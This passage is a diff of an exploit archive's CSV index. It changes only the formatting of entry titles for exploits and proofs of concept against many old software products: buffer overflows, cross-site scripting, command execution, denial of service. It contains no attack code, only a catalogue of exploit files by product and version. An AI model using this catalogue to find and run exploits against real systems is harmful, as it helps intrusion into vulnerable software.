Vulnerability",2000-12-11,dethy,linux,remote,0 -20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 -20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 +20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 +20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,metasploit,windows,remote,7879 @@ -17805,7 +17805,7 @@ id,file,description,date,author,platform,type,port 20515,platforms/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption Vulnerability",2000-12-13,"Ilia Sprite",windows,dos,0 20516,platforms/multiple/remote/20516.txt,"BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 20517,platforms/linux/local/20517.c,"Itetris 1.6.1/1.6.2 Privileged Arbitrary Command Execution Vulnerability",2000-12-19,V9,linux,local,0 -20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 Denial of Service Vulnerability",2000-12-21,"SNS Research",windows,dos,0 +20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service Vulnerability",2000-12-21,"SNS Research",windows,dos,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 Fast Mode TCP Fragment Vulnerability",2000-12-14,"Thomas Lopatic",multiple,remote,0 20520,platforms/solaris/local/20520.pl,"Solaris 2.x/7.0/8 catman Race Condition Vulnerability (1)",2000-11-21,"Vapid Labs",solaris,local,0 20521,platforms/solaris/local/20521.pl,"Solaris 2.x/7.0/8 catman Race Condition Vulnerability (2)",2000-11-21,"Vapid Labs",solaris,local,0 @@ -17897,7 +17897,7 @@ id,file,description,date,author,platform,type,port 20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal Vulnerability",2000-10-13,pestilence,cgi,remote,0 20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS Vulnerability",2001-02-06,"Georgi Guninski",windows,dos,0 -20614,platforms/windows/remote/20614.txt,"aolserver 3.2 win32 - Directory Traversal Vulnerability",2001-02-06,joetesta,windows,remote,0 +20614,platforms/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal Vulnerability",2001-02-06,joetesta,windows,remote,0 20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 Daemon Logging Failure Vulnerability",2001-02-05,"Jose Nazario",unix,remote,0 20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal Vulnerability",2001-02-07,joetesta,windows,remote,0 20617,platforms/unix/remote/20617.c,"SSH 1.2.x CRC-32 Compensation Attack Detector Vulnerability",2001-02-08,"Michal Zalewski",unix,remote,0 @@ -18052,7 +18052,7 @@ id,file,description,date,author,platform,type,port 20777,platforms/linux/local/20777.c,"ISC INN 2.x Command-Line Buffer Overflow Vulnerability (1)",2001-04-18,"Enrique A.",linux,local,0 20778,platforms/linux/local/20778.sh,"ISC INN 2.x Command-Line Buffer Overflow Vulnerability (2)",2001-04-18,"Enrique A.",linux,local,0 20779,platforms/windows/dos/20779.pl,"Oracle 8 Server 'TNSLSNR80.EXE' DoS Vulnerability",2001-04-18,r0ot@runbox.com,windows,dos,0 -20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0 +20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd Remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation Vulnerability",2001-04-18,"Paul Starzetz",linux,local,0 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0 20783,platforms/windows/remote/20783.txt,"Rit Research Labs ""The Bat!"" 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0 @@ -18250,7 +18250,7 @@ id,file,description,date,author,platform,type,port 20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 nidump Password File Disclosure Vulnerability",2001-06-26,"Steven Kreuzer",osx,remote,0 20985,platforms/php/local/20985.php,"PHP 4.x SafeMode Arbitrary File Execution Vulnerability",2001-06-30,"Wojciech Purczynski",php,local,0 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow Vulnerability",2001-07-02,"Christophe Bailleux",linux,local,0 -20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 Webroot Disclosure Vulnerability",2001-07-02,sween,asp,webapps,0 +20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure Vulnerability",2001-07-02,sween,asp,webapps,0 20988,platforms/linux/local/20988.c,"CylantSecure 1.0 Kernel Module Syscall Rerouting Vulnerability",2001-06-29,"Juergen Pabel",linux,local,0 20989,platforms/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability",2001-07-04,VIPER_SV,windows,dos,0 20990,platforms/linux/local/20990.c,"teTeX 1.0.7 Filters Temporary File Race Condition Vulnerability",2001-06-22,zen-parse,linux,local,0 @@ -18287,7 +18287,7 @@ id,file,description,date,author,platform,type,port 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution Vulnerability",2001-07-21,"giancarlo pinerolo",php,webapps,0 21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting Vulnerability",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 21024,platforms/solaris/local/21024.c,"Solaris 2.6/7.0 DTMail Mail Environment Variable Buffer Overflow Vulnerability",2001-07-24,"NSFOCUS Security Team",solaris,local,0 -21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 Cross-Site Scripting Vulnerability",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 +21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting Vulnerability",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 pagecount File Overwrite Vulnerability",2001-07-22,kyprizel,multiple,remote,0 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 Insecure Default Password Protection Vulnerability",2001-07-25,3APA3A,multiple,remote,0 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 UDP Denial of Service Vulnerability",2001-07-25,blackangels,hardware,dos,0 @@ -18400,7 +18400,7 @@ id,file,description,date,author,platform,type,port 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x Zero Length UDP Packet Resource Consumption Vulnerability",2001-06-21,"Max Moser",windows,dos,0 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability",2001-11-09,"Jouko Pynnonen",windows,remote,0 21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x Source Code Disclosure Vulnerability",2001-11-08,"Felix Huber",multiple,remote,0 -21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 +21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 21148,platforms/php/webapps/21148.txt,"Pinterest Clone Script Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps,0 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x DB Loader TERM Environment Variable Buffer Overflow Vulnerability",2001-11-09,virtualcat,unix,local,0 21151,platforms/linux/remote/21151.txt,"Horde IMP 2.2.x Session Hijacking Vulnerability",2001-11-09,"Joao Pedro Goncalves",linux,remote,0 @@ -18426,8 +18426,8 @@ id,file,description,date,author,platform,type,port 21171,platforms/windows/dos/21171.c,"Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1)",2001-12-11,"Nelson Brito",windows,dos,0 21172,platforms/windows/dos/21172.pl,"Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2)",2001-12-07,"Nelson Brito",windows,dos,0 21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 Weak Username and Password Encryption Vulnerability",2001-12-07,shoeboy,windows,local,0 -21174,platforms/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 Denial of Service Vulnerability",2001-12-10,jimmers,windows,dos,0 -21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 Denial of Service Vulnerability",2001-12-10,jimmers,windows,dos,0 +21174,platforms/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service Vulnerability",2001-12-10,jimmers,windows,dos,0 +21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service Vulnerability",2001-12-10,jimmers,windows,dos,0 21176,platforms/freebsd/local/21176.c,"FreeBSD 4.4 AIO Library Cross Process Memory Write Vulnerability",2001-12-10,"David Rufino",freebsd,local,0 21177,platforms/windows/dos/21177.txt,"Microsoft IIS 5.0 False Content-Length Field DoS Vulnerability",2001-12-11,"Ivan Hernandez Puga",windows,dos,0 21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 Unauthorized Mail Server Use Vulnerability",2001-12-11,http-equiv,windows,remote,0 @@ -18445,7 +18445,7 @@ id,file,description,date,author,platform,type,port 21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,metasploit,linux,remote,0 21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,metasploit,linux,remote,0 21192,platforms/linux/remote/21192.c,"STunnel 3.x Client Negotiation Protocol Format String Vulnerability",2001-12-22,deltha,linux,remote,0 -21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 Cross-Site Scripting Vulnerability",2001-12-28,"SNS Research",multiple,remote,0 +21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting Vulnerability",2001-12-28,"SNS Research",multiple,remote,0 21194,platforms/cgi/remote/21194.txt,"Abe Timmerman zml.cgi File Disclosure Vulnerability",2001-12-31,blackshell,cgi,remote,0 21195,platforms/windows/remote/21195.txt,"Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability",2002-01-01,"Georgi Guninski",windows,remote,0 21196,platforms/windows/remote/21196.txt,"AOL Instant Messenger 4.x - Remote Buffer Overflow",2002-01-02,"Matt Conover",windows,remote,0 @@ -18453,15 +18453,15 @@ id,file,description,date,author,platform,type,port 21198,platforms/windows/remote/21198.html,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1)",2002-01-03,"Tom Micklovitch",windows,remote,0 21199,platforms/windows/remote/21199.txt,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2)",2002-01-03,"Liu Die",windows,remote,0 21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 snmpnetstat Remote Heap Overflow Vulnerability",2002-01-03,"Juan M. de la Torre",linux,remote,0 -21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 Buffer Overflow Vulnerability",2002-01-04,Kanatoko,windows,remote,0 +21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow Vulnerability",2002-01-04,Kanatoko,windows,remote,0 21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script Engine File Opening Denial of Service Vulnerability",2002-01-04,methodic,linux,dos,0 21203,platforms/windows/remote/21203.txt,"Lucent 8.x VitalNet Password Authentication Bypass Vulnerability",2002-01-16,"Mark Cooper",windows,remote,0 -21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability",2002-01-04,"Paul Brereton",windows,remote,0 +21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 - Win32 PHP.EXE Remote File Disclosure Vulnerability",2002-01-04,"Paul Brereton",windows,remote,0 21205,platforms/linux/remote/21205.c,"Boozt 0.9.8 - Buffer Overflow Vulnerability",2002-01-07,"Rafael San Miguel Carrasco",linux,remote,0 -21206,platforms/php/webapps/21206.txt,"PHPNuke AddOn PHPToNuke.PHP 1.0 Cross-Site Scripting Vulnerability",2002-01-06,frog,php,webapps,0 +21206,platforms/php/webapps/21206.txt,"PHPNuke AddOn PHPToNuke.PHP 1.0 - Cross-Site Scripting Vulnerability",2002-01-06,frog,php,webapps,0 21207,platforms/windows/remote/21207.c,"RealPlayer 7.0/8.0 Media File Buffer Overflow Vulnerability",2002-01-05,UNYUN,windows,remote,0 -21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 -21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 +21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 +21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 21210,platforms/linux/remote/21210.txt,"X-Chat 1.x CTCP Ping Arbitrary Remote IRC Command Execution Vulnerability",2002-01-09,"Marcus Meissner",linux,remote,0 21211,platforms/windows/remote/21211.txt,"EServ 2.9x Password-Protected File Access Vulnerability",2002-01-10,"Tamer Sahin",windows,remote,0 21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage Vulnerability",2002-01-08,"Bjorn Djupvik",multiple,remote,0 @@ -18486,7 +18486,7 @@ id,file,description,date,author,platform,type,port 21232,platforms/multiple/dos/21232.c,"Oracle 8i dbsnmp Command Remote Denial of Service Vulnerability",2002-01-17,benjurry,multiple,dos,0 21233,platforms/php/webapps/21233.txt,"PHPNuke 4.x/5.x SQL_Debug Information Disclosure Vulnerability",2002-01-18,zataz.com,php,webapps,0 21234,platforms/osx/dos/21234.sh,"Netopia Timbuktu Pro for Macintosh 6.0.1 - Denial of Service Vulnerability",2002-01-18,"Tekno pHReak",osx,dos,0 -21235,platforms/windows/remote/21235.pl,"Citrix Nfuse 1.6 Published Applications Information Leak Vulnerability",2002-01-22,"Ian Vitek",windows,remote,0 +21235,platforms/windows/remote/21235.pl,"Citrix Nfuse 1.6 - Published Applications Information Leak Vulnerability",2002-01-22,"Ian Vitek",windows,remote,0 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x DNS Request/Reply Denial of Service Vulnerability",2002-01-20,"Andrew Griffiths",unix,dos,0 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 Long Request DoS Vulnerability",2002-01-22,"Alex Hernandez",windows,dos,0 21238,platforms/osx/remote/21238.txt,"Apple MacOS Internet Explorer 3/4/5 File Execution Vulnerability",2002-01-22,"Jass Seljamaa",osx,remote,0 @@ -18499,7 +18499,7 @@ id,file,description,date,author,platform,type,port 21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1)",2001-04-13,3APA3A,windows,dos,0 21246,platforms/windows/dos/21246.c,"Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2)",2001-04-13,3APA3A,windows,dos,0 21247,platforms/linux/local/21247.c,"BRU 17.0 SetLicense Script Insecure Temporary File Symbolic Link Vulnerability",2002-01-26,"Andrew Griffiths",linux,local,0 -21248,platforms/linux/local/21248.txt,"User-Mode Linux Kernel 2.4.17 -8 Memory Access Vulnerability",2000-08-25,"Andrew Griffiths",linux,local,0 +21248,platforms/linux/local/21248.txt,"User-Mode Linux Kernel 2.4.17-8 - Memory Access Vulnerability",2000-08-25,"Andrew Griffiths",linux,local,0 21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 Debug Mode Path Disclosure Vulnerability",2002-01-28,superpetz,cgi,remote,0 21250,platforms/php/webapps/21250.txt,"Webify Blog Arbitrary File Deletion Vulnerability",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure Vulnerability",2012-09-11,L0n3ly-H34rT,php,webapps,0 @@ -18510,10 +18510,10 @@ id,file,description,date,author,platform,type,port 21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - Search.CGI Arbitrary Command Execution Vulnerability",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 Segmentation Violation Vulnerability",2002-01-30,"Taeho Oh",linux,local,0 -21260,platforms/windows/remote/21260.txt,"Microsoft Site Server 3.0 Cross-Site Scripting Vulnerability",2002-01-29,"rain forest puppy",windows,remote,0 +21260,platforms/windows/remote/21260.txt,"Microsoft Site Server 3.0 - Cross-Site Scripting Vulnerability",2002-01-29,"rain forest puppy",windows,remote,0 21261,platforms/unix/remote/21261.txt,"Tru64 Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,remote,0 21262,platforms/linux/remote/21262.txt,"kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,remote,0 -21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0 +21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)",2002-02-03,anonymous,php,remote,0 @@ -18581,7 +18581,7 @@ id,file,description,date,author,platform,type,port 21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (1)",2002-03-08,"Wouter ter Maat",php,remote,0 21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (2)",2002-03-08,"Wouter ter Maat",php,remote,0 21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service Vulnerability",2002-03-08,"Alex Hernandez",windows,dos,0 -21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 Denial of Service Vulnerability",2002-03-09,"H Zero Seven",multiple,dos,0 +21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service Vulnerability",2002-03-09,"H Zero Seven",multiple,dos,0 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 Garbage Denial of Service Vulnerability",2002-03-09,b0iler,linux,dos,0 21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass Vulnerability",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability",2002-03-11,Fyodor,cgi,remote,0 @@ -18599,7 +18599,7 @@ id,file,description,date,author,platform,type,port 21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 Form Manipulation Vulnerability",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x/2.3/2.4.x d_path() Path Truncation Vulnerability",2002-03-26,cliph,linux,local,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution Vulnerability",2002-03-26,"Steve Gustin",cgi,remote,0 -21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 Cross-Site Scripting Vulnerability",2002-03-27,"Eric Detoisien",jsp,remote,0 +21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting Vulnerability",2002-03-27,"Eric Detoisien",jsp,remote,0 21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 Insecure Temporary Directory Creation Vulnerability",2002-03-27,spybreak,linux,local,0 21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 caselist Arbitrary Module Include Vulnerability",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x Theme Remote Command Execution Vulnerability",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 @@ -18666,12 +18666,12 @@ id,file,description,date,author,platform,type,port 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability",2002-04-24,ERRor,windows,dos,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0 -21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0 +21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0 21424,platforms/php/webapps/21424.txt,"Admanager 1.1 Content Manipulation Vulnerability",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 -21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0 +21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0 21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0 @@ -18687,9 +18687,9 @@ id,file,description,date,author,platform,type,port 21441,platforms/hardware/remote/21441.txt,"Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability",2002-05-09,"Patrick Michael Kane",hardware,remote,0 21442,platforms/linux/remote/21442.c,"Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)",2002-05-10,korty,linux,remote,0 21443,platforms/linux/remote/21443.c,"Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)",2002-05-10,"0x3a0x29 crew",linux,remote,0 -21444,platforms/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 Cross-Site Scripting Vulnerability",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 +21444,platforms/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting Vulnerability",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 21445,platforms/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 File Disclosure Vulnerability",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 -21446,platforms/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 Cross-Site Scripting Vulnerability",2002-04-17,frog,windows,remote,0 +21446,platforms/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 - Cross-Site Scripting Vulnerability",2002-04-17,frog,windows,remote,0 21447,platforms/php/webapps/21447.txt,"XMB Forum 1.6 Magic Lantern Cross-Site Scripting Vulnerabilities",2002-05-11,frog,php,webapps,0 21448,platforms/php/webapps/21448.txt,"XMB Forum 1.6 Magic Lantern Log File Vulnerabilities",2002-05-11,frog,php,webapps,0 21449,platforms/php/webapps/21449.txt,"NOCC 0.9.x Webmail Script Injection Vulnerability",2002-05-14,ppp-design,php,webapps,0 @@ -18716,7 +18716,7 @@ id,file,description,date,author,platform,type,port 21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 File Disclosure Vulnerability",2002-05-22,"Matt Moore",windows,remote,0 21471,platforms/windows/dos/21471.c,"NewAtlanta ServletExec/ISAPI 4.1 JSPServlet Denial of Service Vulnerability",2002-05-22,"Matt Moore",windows,dos,0 21472,platforms/hardware/dos/21472.pl,"Cisco CBOS 2.x Broadband Operating System TCP/IP Stack Denial of Service Vulnerability",2002-05-23,blackangels,hardware,dos,0 -21473,platforms/cgi/webapps/21473.txt,"ViewCVS 0.9.2 Cross-Site Scripting Vulnerability",2002-05-24,office,cgi,webapps,0 +21473,platforms/cgi/webapps/21473.txt,"ViewCVS 0.9.2 - Cross-Site Scripting Vulnerability",2002-05-24,office,cgi,webapps,0 21474,platforms/php/webapps/21474.txt,"OpenBB 1.0.0 RC3 - BBCode Cross Agent HTML Injection Vulnerability",2002-05-24,frog,php,webapps,0 21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure Vulnerability",2002-05-24,"Tamer Sahin",windows,remote,0 21476,platforms/linux/dos/21476.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial of Service Vulnerability (1)",2002-05-24,zillion,linux,dos,0 @@ -18752,7 +18752,7 @@ id,file,description,date,author,platform,type,port 21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 PKG-Installer Buffer Overflow Vulnerability",2002-06-03,badc0ded,linux,local,0 21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification Vulnerability",2002-06-03,badc0ded,linux,local,0 21508,platforms/windows/dos/21508.py,"SafeNet Sentinel Keys Server Crash PoC",2012-09-24,retset,windows,dos,0 -21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 Cross-Site Scripting Vulnerability",2002-06-03,frog,php,webapps,0 +21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting Vulnerability",2002-06-03,frog,php,webapps,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6, Microsoft ISA Server 2000, Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow Vulnerability",2002-06-04,eSDee,multiple,remote,0 21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 SysLog Remote Format String Vulnerability",2002-06-04,zillion,freebsd,dos,0 @@ -18765,10 +18765,10 @@ id,file,description,date,author,platform,type,port 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 -21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 +21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 